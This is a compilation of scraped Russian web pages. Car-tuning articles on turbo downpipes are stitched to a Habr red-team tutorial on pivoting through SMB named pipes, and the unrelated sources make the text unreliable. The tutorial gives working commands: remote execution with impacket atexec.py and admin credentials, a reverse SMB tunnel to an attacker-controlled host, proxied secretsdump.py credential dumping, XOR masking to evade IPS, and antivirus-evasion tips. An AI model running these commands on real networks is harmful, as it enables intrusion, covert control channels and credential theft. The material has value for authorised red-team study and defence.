Не так давно я писал две статьи: — про типы турбин, и как работает турбина. Читателем они понравились, причем там внизу в статьях есть мои подробные видео, посмотрите. Но один из читателей задал мне вопрос – с турбинами часто применяют даунпайп, что это такое и зачем он вообще нужен? Я также задался таким вопросом, и появилось вполне логичное объяснение, сегодня я постараюсь вам рассказать, что говорится на пальцах, зачем это нужно. Информация не хуже википедии, внизу будут фото и мое видео, так что читайте — смотрите …
Как обычно начнем с определения.
Даунпайп (от анг. Downpipe, переводится как – водосточная труба) – это элемент системы выхлопных газов, который используется при «нештатном» тюнинге, основное назначение соединить выхлопную систему автомобиля и турбину. Скажем так, если не справляется штатный глушитель, а зачастую при турбировании двигателя это так, то нужно брать «трубу» специальных размеров и форм с улучшенными характеристиками, которая, позволит подключить турбину! Она не только лучше нагнетает давление отработанных газов на крыльчатку турбины, но и эффективно противостоит горячим газам.
Строение и особенности
Становится понятно, даунпайп — это просто, реально труба (часть глушителя) — носит функцию подвода газов, до турбины! Которые, идут от двигателя (то есть горячие). Ее делают больше в диаметре, чем штатная система, а также применение влечет за собой исключение из системы таких элементов как катализатор. То есть здесь на экологию как бы все равно!
Может быть исключен и средний резонатор, то есть мы по максимуму стараемся облегчить газам выход, от двигателя и турбины.
Также нужно понимать, если вы устанавливаете даунпайп, вам нужно модернизировать и остальной глушитель, возможно применение прямотоков.
Строение отличается еще и тем что — такая труба должна иметь в своем строении гофру, которая будет в обязательном порядке глушить колебания (вибрации) на кузов!
Посмотрите фото уже изготовленных вариантов в статье.
Зачем вообще нужно?
А можно ли обойтись без этой «трубы»? Конечно можно – просто не устанавливайте нештатную турбину на мотор. Ведь основное назначение – это соединение не заводского агрегата в вашу систему выхлопа.
Объясняю на пальцах:
Просто представьте – захотели вы «турбировать» КАЛИНУ (или ПРИОРУ), причем вы решили ставить не компрессор, а именно турбину на отработанных газах. Ну воткнули ее на движок, а дальше то что? Она же должна иметь подвод отработанных газов от двигателя! Штатный глушитель вы навряд-ли найдете, АВТОВАЗ просто их не выпускает – не рассчитаны наши АВТОВАЗ под такую «прокачку», тогда что? Все просто, вы начинаете рыть инет и искать нештатную подводку отработанных газов!
Именно этот вариант и будет называться буржуйским словом «даунпайп». Сейчас существуют десятки фирм, которые вам его изготовят.
А что есть и заводские?
Конечно есть, например это очень распространено на американских авто, именно там на одну модель может существовать несколько видов выхлопной системы. Конечно не отстают и европейцы, японцы.
Опять же простыми словами и очень утрированно:
Принцип какой – ну есть у вас мощный турбированный автомобиль, но вам становится как бы недостаточно мощности турбины, и вы решаете – ХОЧУ МОЩНЕЕ! Нужно ставить другое «турбо»! А вот под нее нужно другую отводную трубу (даунпайп), вы собираетесь, едете в магазин запчастей вашего бренда, и вам продают новую «ТУРБУ» и новый подвод к ней от двигателя. Конечно это не так чтобы вот на «каждом шагу», но например, на некоторые модели можете найти. В итоге получаем больший «надув» и другую подводку.
Из чего и как изготавливается?
Все легко и просто, применение материалов здесь на высшем уровне, как правило, стоят они недешево, а поэтому делаются только из высокопрочных материалов. Например жаростойкая сталь, или ее сплавы, нужно понимать что это практически штучный материал, который производится в ручную для каждой машины.
То есть если вы обращаетесь в такую контору и говорите – купил ТУРБО такой то фирмы для ПРИОРЫ, хочу ее подключить. Люди снимают мерки, и именно под ваш двигатель и ваш авто, делают даунпайп – это я конечно утрировал, в серьезных компаниях все уже давно измерено, но суть это отображает.
Как установить?
После изготовления «даунпайпа» вы скорее всего купите и более эффективный коллектор, для отвода отработанных газов, скорее всего это будет какой-нибудь «паук»!
Что делаем:
1) Снимаем штатный коллектор, заменяем на прокаченный (типа «паук»)
2) Ставим турбину, подключаем – настраиваем на двигателе
3) Устанавливаем от «паука» даунпайп
4) И уже от него подключаем вывод горячей «отработки» к турбине, они будут раскручивать лопасти колеса.
Вот и все, наша система готова. Сейчас я думаю, у вас в голове отложилось, что это такое и как вообще работает. Если нет, смотрим видео версию статьи.
Кстати еще одно непонятное слово — койловеры, здесь тюнингуется подвеска, почитайте интересно.
НА этом заканчиваю, если статья понравилась, «лайкаем» в соцсетях, буду признателен.
(24 , 4,46 из 5)
Источник: http://avto-blogger.ru/tyuning/daunpajp-chto-eto-takoe-zachem-ustanavlivayut.html
Что такое даунпайп в автомобиле
Для многих молодых уличных гонщиков прокачать свой автомобиль является делом чести. Даунпайп используется при проведении тюнинга турбины или ее замене на модель помощнее. Расскажем о том, что такое даунпайп в автомобиле.
Что такое даунпайп в авто и где он расположен
В переводе с английского “даун пайп” означает “водосточная труба”. Предназначение детали в авто – отведение от двигателя выхлопных газов. Даунпайп устанавливается сразу за турбиной, правее двигателя. Он выводит газы в выхлопную систему. Даунпайн изготавливается из прочных, устойчивых к высоким температурам, металлов. Делается под заказ и зависит от модели автомобиля, конструкции его выхлопной системы, особенностей двигателя и указанных владельцем параметров.
Функционал устройства
Так для чего нужен даунпайп и какие функции он выполняет? Так как это труба, изготовленная из высокопрочной, нержавеющей стали (в большинстве вариантов), предназначенная для отвода выхлопных газов, она должна выдерживать высокие температуры. Повышенные жароустойчивые свойства – это главное требование к качеству устройства. Обычно его делают из нержавеющей стали сварным способом.
Чтобы добиться прочности сварных швов, используется аргонно-дуговая сварка.
В конструкцию входит многослойная гофра. Она снижает вибрации и колебания, которые передаются на кузов. Даунпайп крепится к системе фланцевым методом. Фланцы обеспечивают надежное и прочное соединение устройства с другими составляющими системы. Для этого крепежи дополнительно обрабатываются с точностью до миллиметра.
В функционал даунпайпа входят:
соединение двигателя и турбины с системой отвода выхлопных газов;
отвод выхлопных газов из двигателя и турбины с меньшим сопротивлением;
возможность увеличения мощности при чип-тюнинге.
Даунпайп устанавливается после демонтажа заводского выпускного коллектора. Даунпайп является деталью большей производительности для улучшения функционирования выхлопной системы в целом. С его помощью можно увеличить аэродинамические качества автомобиля. Даунпайп становится ключевым элементом для проведения модернизации выхлопной системы авто.
Устройство будет незаменимой комплектующей при установке новой, более мощной турбины или превращения обычного автомобиля в турбинный гоночный болид. Такой тюнинг призван напрочь сносить заводскую выхлопную систему и устанавливать детали, способные выдержать высокотемпературную нагрузку. По сути, даунпайп – это большая труба, в которой ничто не задерживает потоки отработанных газов.
Виды даунпайпа
Даунпайпы бывают без катализатора и со спортивным катализатором. Обе модели обладают одинаковой производительностью и эффективностью. Разница заключается в наличии фильтра (катализатора), очищающего выхлопные газы до нормативов Евро 4-5. Это дает владельцу авто относительное спокойствие по поводу загрязнения окружающей среды, однако не более того. Даунпайп со спорт катализатором стоит немного дороже. По свойствам он аналогичен с даунпайном без катализатора. Он также имеет высокую пропускную способность и повышенную производительность.
Существует разновидность даунпайпа, которая устанавливается на атмосферный двигатель (без турбины). Автомастерские изготавливают или приобретают для тюнинга два вида устройств. Аппайп устанавливается только на турбинные двигатели, а даунпайп может быть установлен и на атмосферные. В этом случае сохраняется весь функционал устройства, зато решаются проблемы с фильтрацией выхлопных газов и быстрым их отводом.
Плюсы и минусы использования устройства
Стоит ли устанавливать даунпайп, и есть ли у устройства особые недостатки, — таким вопросами задаются автолюбители. При тюнинге по установке турбины, выхлопную систему придется менять по умолчанию. В других случаях автослесари также рекомендуют установить даунпайп, так как отмечают в устройстве следующие плюсы:
большая пропускная способность;
большой диаметр трубы;
высокая эффективность, доказанная на практике;
возможность уменьшения эффекта «турбо-ямы» или «турбо-провала».
Если установить даунпайп с катализатором, то можно решить проблему очистки выхлопных газов до стандартов Евро 4-5. Это позволит беспрепятственно путешествовать по странам Евросоюза, не опасаясь быть оштрафованным за загрязнение окружающей среды и несоблюдение общеевропейских норм безопасности.
Как у любого устройства, у даунпайпа есть свой минус. Это достаточно высокая цена детали, несмотря на то, что ее качество полностью соответствует современным параметрам. Также возможны трудности при монтаже устройства. Несмотря на точную подгонку фланцев, нужно на всякий случай запастись лишними деталями: гайками, болтами для хомута выхлопной трубы, шпильками соединительного фланца.
Не рекомендуется проводить самостоятельный тюнинг при отсутствии знаний и навыков замены выхлопной системы автомобиля. Это может привести к негативным последствиям, а также потери денежных средств. Специализирующиеся на автотюнинге салоны сделают эту работу быстрее и профессиональнее. В основном они предлагают приемлемые цены, доступные для любого кармана. За даунпайп наоборот придется выложить круглую сумму.
Устанавливать даунпайп или обойтись системой, установленной производителем автомобиля, решать владельцам. От смены деталей улучшений может и не произойти. Современные автомобили оснащены высокоэффективной выхлопной системой, которую, возможно, не стоит менять. В любом случае, установка даунпайпа не помешает и не повредит эффективной работе автомобиля.
Как выбрать антифриз для автомобиля
28.05.2020
Замена и доливка антифриза является важным процессом для обеспечения бесперебойной работы автомобиля. Это такая же необходимая процедура, как заправка автомобиля топливом, смена масла и проведение регулярного технического осмотра. Не каждая марка антифриза подойдет для конкретной модели автомобиля. О том, как выбрать антифриз, рассказывает эта статья. Подробнее
Источник: https://avtoinstruktor199.ru/news/chto-takoe-daunpajp-v-avtomobile/
Что такое downpipe и для чего он нужен — Справочник водителя
Наверное многие слышали всякие модные слова по поводу глушителя, но не до конца поняли из смысл и очень бы хотели знать, что же такое пайп, даунпайп, exhaust system, catback, и другие зашифрованные словечки. Мы расскажем, что такое тюнинг глушителя на языке тюнеров и переведем его на русский. Поехали
Источник: https://injcar.ru/remont/chto-takoe-downpipe-i-dlya-chego-on-nuzhen.html
Используем пайпы для пивотинга
Ни для кого не секрет, что корпоративные IPS становятся все умнее и умнее. Сейчас уже никого не удивишь IPS с SSL-митмом на периметре сети или даже внутри корпоративной сети между сегментами. В то же время, помимо всем известных IPS, стали появляться и распространяться различные EDR-решения, которые уже непосредственно на хостах смотрят за устанавливаемыми соединениями. В связи с этим порядочному RedTeam специалисту с каждым днем все труднее и труднее скрываться от вездесущего взгляда BlueTeam. Приходится становиться все изобретательнее в своей нелегкой работе.
Одним из решений для маскировки наших «более полезных деструктивных действий»(с) внутри корпоративных сетей может послужить использование протоколов SMB или RDP. Можно спрятаться внутри них и замаскироваться под легитимный трафик. В этом ничего особо нового нет и техника маскировки внутри SMB используется со времен знаменитых APT-компаний Duqu и Sauron. Там ребята также с большим успехом использовали SMB протокол для передачи управляющих команд своим агентам. После этого данную технику переняли разработчики Metasploit и Cobalt Strike.
В данной статье мы рассмотрим варианты использования протокола SMB для пивотинга, а RDP уже оставим на потом.
Используем SMB
Итак, давайте разберем, что же такого прекрасного в использовании SMB для пивотинга. Во-первых, это широкое распространение. SMB — это практически родной протокол microsoft, то и в корпоративных сетях с windows он используется повсеместно и очень много где. Тут тебе и DFS, и обновления различные, и принтеры и много-много всего-всего. Очень удобно. Правда, за пределы корпоративной сети, а уж тем более снаружи внутрь 445-й TCP порт сейчас частенько стали закрывать на фаерволах.
Всему виной участившиеся случаи фишинга и релеинга с использованием ссылок типа file://x.x.x.x, \x.x.x.x и т.д. И конечно не забудем про WannaCry, которая заставила многие организации закрыть торчащий наружу порт. Во-вторых, в современных системах, типа Win10/Win2016 и выше информация, передаваемая внутри протокола SMB, точнее уже SMB3 шифруется по умолчанию. Т.е. передавая ваш любимый сплоит внутри SMB можно смело быть спокойным, что корпоративные IPS его не заметят (спасибо Micosoft за это!).
В-третьих, протокол SMB предоставляет удобный механизм так-называемых пайпов (SMB pipes) — это фактически те же именованные пайпы, только доступные по сети. К примеру, строка вида \192.168.1.10pipeatsvc — это пайп службы scheduled tasks. Как раз с ним и работает atexec из фреймворка impacket для создания задач по выполнению команд в windows. Посмотреть все открытые пайпы на вашей системе можно с помощью утилиты от Sysinternals: pipelist.exe (pipelist64.exe) или через тот же powershell: [System.IO.
Directory]::GetFiles(«\.\pipe\»)
Погружение
Итак, давайте посмотрим, как мы можем использовать SMB пайпы для наших, «более полезных деструктивных действий». Мы хотим использовать пайпы для скрытной связи с нашим командным шеллом. Суть в том, что мы запускаем на целевой машине своего агента или шелл, а связь с ним держим через протокол SMB. К примеру, в метасплоите есть специальные пейлоды для работы c пайпами: meterpreter_bind_named_pipe bind_named_pipe С помощью них вы можете без труда «повесить» ваш listener (будь то meterpreter или обычный командный шелл) на named pipe, тем самым скрыв его от зорких глаз админа безопасности.
Но, конечно же, все мы хорошо знаем, что использовать msf пейлоды в ходе боевого пентеста/редтима совсем небезопасно и настоящие тру-хакеры используют кастомный инструментарий, как говорится — от греха подальше… Альтернативой для msf в качестве командного шелла может являться наш старый-добрый помощник — powershell. В сети существует много примеров по использованию пайпов в качестве канала для коммуникации с С2. Один из них — это утилита Invoke-PipeShell от команды Threatexpress. Она работает в режиме сервер-клиент и шифрует весь свой трафик 256-битным AES-ключом.
На сервере мы запускаем: Invoke-PipeShell -mode server -aeskey aaaabbbbccccdddd -pipe eventlog_svc -commandtimeout 30 На клиенте запускаем: Invoke-PipeShell -mode client -server targetserver.domain.com -aeskey aaaabbbbccccdddd -pipe eventlog_svc -i -timeout 1000 Естественно, наш клиент должен быть авторизован на сервере, так что не забудьте сначала провести авторизацию: net use \targetserver.domain.comIPC$ /user:admin Password1
После удачного подключения мы получаем полноценную Powershell консоль. Все подробности по работе с этим инструментом, как и сам код можно почерпнуть на гите.
Хорошо. Это вроде понятно.
Теперь давайте подумаем, как нам сделать пивотинг внутрь целевой сети через SMB пайпы. К примеру, если на периметре сети открыт только 445-й порт (а бывает и такое…) или соединения наружу от нашего туннелера по SSL беспощадно блокируются корпоративным фаерволом, а вот протокол SMB почему-то закрыть забыли. В этом случае нам необходимо пробросить внутри пайпа полноценный TCP-туннель для того, чтобы мы могли работать с внутренними ресурсами целевой сети. Первое, что приходит в голову — это тот же meterpreter со стейджингом через пайпы. Он прекрасно умеет это делать. Подробности здесь мы рассматривать не будем, т.к.
тут все стандартно и по мануалу. Желающие могут почитать инструкцию к metasploit, или посмотреть короткую версию здесь.
О недостатках meterpreter мы уже упоминали выше. Поэтому, давайте посмотрим, что у нас есть еще для пивотинга через пайпы…
После беглого гугления по теме туннелинга через пайпы помимо meterpreter нашлись только Cobalt Strikeи разработка от DxFlatLine.
Первый вариант, во-первых, платный, а во-вторых — ему присущи все те же недостатки, что и meterpreter. Второй вариант сделан в качестве PoC, работает только в однопоточном режиме и дает туннелировать только одно соединение — т.е., как вы можете догадаться, тоже не вариант для постоянного применения на практике.
И что делать?
Немного подумав над проблемой, мы решили… А почему бы нам не адаптировать нашу прошлую разработку Rsockstun, о которой мы уже писали, под работу с пайпами? Тем более, что архитектура приложения позволяет это сделать с легкостью. Вместо подключения по TCP мы будем использовать подключение по SMB. Это даже упрощает работу утилиты: не надо беспокоиться о SSL, подключении через прокси-сервер и т.д.
Оставим только вариант с изначальной авторизации клиента на сервере по паролю, т.к. пайпы — это общедоступная сущность, и, соответственно, читать и писать в них может не только наш туннелер, но и другой софт, в том числе и удаленно. Права доступа к пайпам, а также сканирование и энумерация пайпов на удаленной машине — это отдельная тема для разговоров. Желающие могут изучить ее на примере metasploit модулей scanner/smb/pipe_auditor и scanner/smb/pipe_rpc_auditor.
Для работы с пайпами из Go мы будем использовать библиотеку npipe
Она сделана достаточно давно и хорошо зарекомендовала себя в различных проектах. Работа через данную библиотеку принципиально не отличается от работы через стандартные механизмы Net: те же функции net.Dial, net.Listen, net.Accept.
Для мультиплексирования нескольких подключений внутри одного пайпа, как и в прошлый раз, мы будем использовать мультиплексор Yamux и socks5 — прокси-сервер. Подробнее про необходимость мультиплексирования внутри TCP и сам yamux вы можете почитать в нашей прошлой статье про rsockstun.
Еще одним отличием и доработкой версии с пайпами, по сравнению с rsockstun, будет то, что теперь yamux-server и соответственно, socks5-proxy могут быть запущены на обоих концах туннелера (правда не одновременно, а либо там, либо там). Это сделано для того, чтобы туннель можно было строить как снаружи вовнутрь целевой сети, так и обратно…
А теперь как обычно — нюансы
Рисунок 1 — Дамп трафика работы туннелера на Windows 7 На рисунке 1 показано, как будет выглядеть работа нашего туннелера в случае, если хотя бы один из его концов работает на Windows 7. Здесь красная зона — это этап авторизации, зеленая — открытие пайпа, а синяя — непосредственно передача информации. Так же необходимо обратить внимание на то, что используется протокол SMBv2.
Фактически это означает, что все что мы передаем внутри туннеля — будет видно открытым текстом: В отличие от Win7, на Windows10 используется шифрование данных внутри протокола SMB3: Как мы видим — ни имени пайпа, ни данных внутри туннеля открытым текстом не передается.
Проверить, работает ли на Вашей системе SMB3 шифрование можно через стандартный powershell cmdlet Get-SmbServerConfiguration И при выключенном шифровании — так же просто его активировать: Однако, не всегда мы можем быть уверенными, что шифрование внутри SMB будет включено по умолчанию, а включать его на чужом сервере или сети — не самая хорошая идея… В связи с этим нам необходимо предусмотреть в нашем туннелере режим, который позволил бы зашифровать трафик внутри нашего туннеля.
Причем у нас не стоит задача надежно зашифровать так, чтобы расшифровать могли только на суперкомпьютере АНБ, а всего лишь спрятать сигнатуры трафика внутри туннелера от IPS. В связи с этим мы будем использовать простой XOR с небольшим ключом для маскировки нашего трафика, что позволит нам экономить ресурсы процессора и практически не повлияет на скорость передачи. Чтобы не создавать лишний сетевой уровень, ответственный за шифрование трафика, мы внесем функционал непосредственно в состав модуля yamux, ответственного за передачу полезной нагрузки (модуль stream.go, и функции Read и Write): func xoring(istr *[]byte, key string){ for i := 0; i < len(*istr); i++ {(*istr)[i] = (*istr)[i] key[i % len(key)]}} После внесения изменений наш GET запрос уже не так хорошо виден в трафике:
Один, два, три… Пуск!
Итого, варианты запуска и соответственно применения нашего туннелера будут такими:
Вариант 1. Подключение снаружи внутрь сети и проброс Socks5 соединения. Например, когда наружу торчит 445-й порт и мы знаем креды для подключения:
На внутреннем сервере через SMB подключение и утилиту impacket запускаем серверную часть rsockpipe: ./atexec.py administrator:adminPassw0rd@ «rsockspipe.exe -listen .rsockspipename -pass Password1234» На внешней (подконтрольной нам) Windows-машине запускаем клиентскую часть rsockspipe и после установления соединения используем её как socks5 proxy: rsockspipe.exe -connect x.x.x.xrsockspipename -socks y.y.y.y:1080 -pass Pass-word1234proxychains secretsdump.py admin:Passw0rd@y.y.1.10
Вариант 2. Подключение изнутри наружу по протоколу SMB. Когда подключения наружу по всем web-протоколам жестко мониторятся, а про SMB админы почему-то позабыли… На внешней (подконтрольной нам) Windows машине (ip: Y.Y.Y.Y) запускаем клиентскую часть rsockspipe и ждем подключения клиентов: rsockspipe.exe -listen .rsockspipename -socks y.y.y.y:1080 -pass Password1234 На сервере внутри целевой сети запускаем клиентскую часть (так же через impacket): ./atexec.py administrator:adminPassw0rd@ «rsockspipe.exe -connect Y.Y.Y.Yrsockspipename -pass Password1234» После удачного подключения можем пользоваться нашим сервером как soscks5: proxychains secretsdump.py admin:Passw0rd@y.y.1.10 Тут есть одно замечание, особенно ко второму варианту. Помните, мы говорили, что для удачного подключения к пайпу мы должны быть авторизованы на серверной части, т.е. перед запуском туннелера нам необходимо пройти авторизацию. Сделать это можно так: net use \y.y.y.yipc$ /user: Так вот… Во втором варианте использования команда net use запускается на целевой машине. А это означает что на целевой машине (в памяти процесса lsass) остаются креды от Вашей Windows машины. И если они будут админские (а как правило все начинающие хакеры работаю от админа…), то это может привести к «обратному привету» от BlueTeam… В общем, думаете, когда что-либо делаете…
Вместо заключения
В целом, туннелер получился достаточно неплохой… Главное, что готов к активному применению.
Исходный код, как и уже скомпилированные бинари под x86 и x64 расположены на нашем гите
И Небольшое дополнение. Последнее время стали замечать, что Golang-софт, скомпилированный в режиме Win GUI (компиляция в режиме: go build -ldflags=»-H windowsgui»), стал сильно палится некоторыми анти-вирусными решениями (KAV, SEP14). Доходит уже до смешного — откомпилированный в GUI-режиме «Hello World» детектируется как зловред. Видимо, это из-за того, что Golang все-таки стал излюбленным средством малварщиков. Так что наш совет — компилировать проект в стандартном консольном режиме, а с черным cmf-окошком настоящий хакер знает, как справиться (в качестве подсказки — тот же impacket, например).
P.S. «Более полезные деструктивные действия» — формулировка Д.Самарцева — директора компании BiZone. В дан-ном случае она наиболее точно описывает суть работы RedTeam специалистов.
- [mis]team
- pivoting
- redteam
- rsosckpipe
Хабы:
- Информационная безопасность
- Тестирование IT-систем
Источник: https://habr.com/post/460659/